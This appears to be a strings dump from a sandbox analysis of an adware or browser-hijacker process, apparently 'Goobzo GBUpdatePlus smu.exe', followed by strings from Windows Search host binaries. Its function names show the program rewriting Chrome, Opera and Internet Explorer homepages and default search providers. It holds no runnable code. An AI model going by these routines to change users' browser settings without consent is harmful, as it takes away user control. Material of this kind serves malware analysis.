[Explorer::BrowserSettings::SetSearchScopeKeyValues]

[Explorer::BrowserSettings::SetAboutURLsKeyValues]

Result.SearchScope:

Argument.SearchScopeToSearch:

Argument.Parent:

[Explorer::BrowserSettings::DeleteKey]

Argument.Subkey:

VirtualSpeedbitSearchScopeKey::EnsureKeyW

Key deleted:

TopResultURL

FaviconURLFallback

SuggestionsURL

SuggestionsURLFallback

\Opera\launcher.exe

Opera Software\Opera Stable\

\Opera\

\opera.pak

Web Data

\resources\default_partner_content.json

KERNELBASE.DLL

Chrome::InstallInfo::Get

[Chrome::BrowserSettings::OpenConfigFiles]

SQLite::WebDataDB::Create

Argument.HomePageUrl:

[Chrome::BrowserSettings::SetHomePagePreferences]

[Chrome::BrowserSettings::SetDefaultProviderPreferences]

Argument.HomePageIsNewTabPage:

Argument.DefaultProviderKeyWord:

Argument.DefaultProviderId:

Argument.DefaultProviderEncoding:

Argument.DefaultProviderName:

Argument.DefaultProviderIconUrl:

Argument.DefaultProviderSearchUrl:

[Chrome::BrowserSettings::SetRestoreOnStartupPreferences]

Argument.DefaultProviderSuggestUrl:

Argument.UrlsToRestoreOnStartup:

Argument.RestoreOnStartup:

Argument.KeywordToSearch:

[Chrome::BrowserSettings::GetSearchProviderId]

SQLite::WebDataDB::GetProviderById

SQLite::WebDataDB::GetFirstProviderId

[Chrome::BrowserSettings::EnsureSearchProvider]

Result.ProviderId:

[Chrome::BrowserSettings::DeleteSearchProvider]

SQLite::WebDataDB::Values::Create

[Chrome::BrowserSettings::MakeSnapshot]

[Chrome::BrowserSettings::RestoreState]

Chrome::BrowserSettings::DeleteSearchProvider

Chrome::BrowserSettings::OpenConfigFiles

SQLite::WebDataDB::SetDefaultProvider

[Chrome::BrowserSettings::PropagateState]

Chrome::BrowserSettings::EnsureSearchProvider

%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe

SearchProtocolHost.exe_3464:

.text

`.data

.rsrc

@.reloc

ADVAPI32.dll

ntdll.DLL

KERNEL32.dll

msvcrt.dll

USER32.dll

ole32.dll

OLEAUT32.dll

TQUERY.DLL

MSSHooks.dll

IMM32.dll

SHLWAPI.dll

SrchCollatorCatalogInfo

SrchDSSLogin

SrchDSSPortManager

SrchPHHttp

SrchIndexerQuery

SrchIndexerProperties

SrchIndexerPlugin

SrchIndexerClient

SrchIndexerSchema

Msidle.dll

Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default

pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty

d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx

d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx

d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp

d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx

RegDeleteKeyW

RegDeleteKeyExW

8%uiP

Invalid parameter passed to C runtime function.

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp

-d-d-d-d-d-d-d-%d

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h

0xx=

%s(%d)

tid="0x%x"

pid="0x%x"

tagname="%s"

tagid="0x%x"

el="0x%x"

time="d/d/d d:d:d.d"

logname="%s"

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx

SHELL32.dll

PROPSYS.dll

ntdll.dll

RegCloseKey

RegCreateKeyExW

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

ReportEventW

_amsg_exit

MsgWaitForMultipleObjects

SearchProtocolHost.pdb

2 2(20282|2

4%5S5

Software\Microsoft\Windows Search

https

kernel32.dll

msTracer.dll

msfte.dll

lX-X-X-XX-XXXXXX

SOFTWARE\Microsoft\Windows Search

tquery.dll

%s\%s

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

Windows Search Service

0xx%p%S%d

advapi32.dll

WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll

winhttp.dll

Software\Microsoft\Windows Search\Tracing

Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported

Software\Microsoft\Windows Search\Tracing\EventThrottleState

%S(%d)

tagname="%S"

logname="%S"

Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}

.\%s.mui

.\%s\%s.mui

%s\%s.mui

%s\%s\%s.mui

Microsoft Windows Search Protocol Host

7.00.7601.17610 (win7sp1_gdr.110503-1502)

SearchProtocolHost.exe

Windows

7.00.7601.17610

SearchFilterHost.exe_3964:

.text

`.data

.rsrc

@.reloc

ADVAPI32.dll

ntdll.DLL

KERNEL32.dll

msvcrt.dll

USER32.dll

ole32.dll

OLEAUT32.dll

TQUERY.DLL

IMM32.dll

MSSHooks.dll

mscoree.dll

SHLWAPI.dll

d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp

RegDeleteKeyW

RegDeleteKeyExW

8%uiP

d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx

Invalid parameter passed to C runtime function.

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp

-d-d-d-d-d-d-d-%d

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx

RegCloseKey

RegCreateKeyExW

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

ReportEventW

_amsg_exit

SearchFilterHost.pdb

version="5.1.0.0"

name="Microsoft.Windows.Search.MSSFH"

3 3(30383|3

kernel32.dll

Software\Microsoft\Windows Search

SOFTWARE\Microsoft\Windows Search

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

Windows Search Service

tquery.dll

advapi32.dll

API-MS-Win-Core-LocalRegistry-L1-1-0.dll

0xx%p%S%d

Software\Microsoft\Windows Search\Tracing

Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported

Software\Microsoft\Windows Search\Tracing\EventThrottleState

0xx=

%S(%d)

tid="0x%x"

pid="0x%x"

tagname="%S"

tagid="0x%x"

el="0x%x"

time="d/d/d d:d:d.d"

logname="%S"

Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}

.\%s.mui

.\%s\%s.mui

%s\%s.mui

%s\%s\%s.mui

%s\%s

winhttp.dll

Microsoft Windows Search Filter Host

7.00.7601.17610 (win7sp1_gdr.110503-1502)

SearchFilterHost.exe

Windows

7.00.7601.17610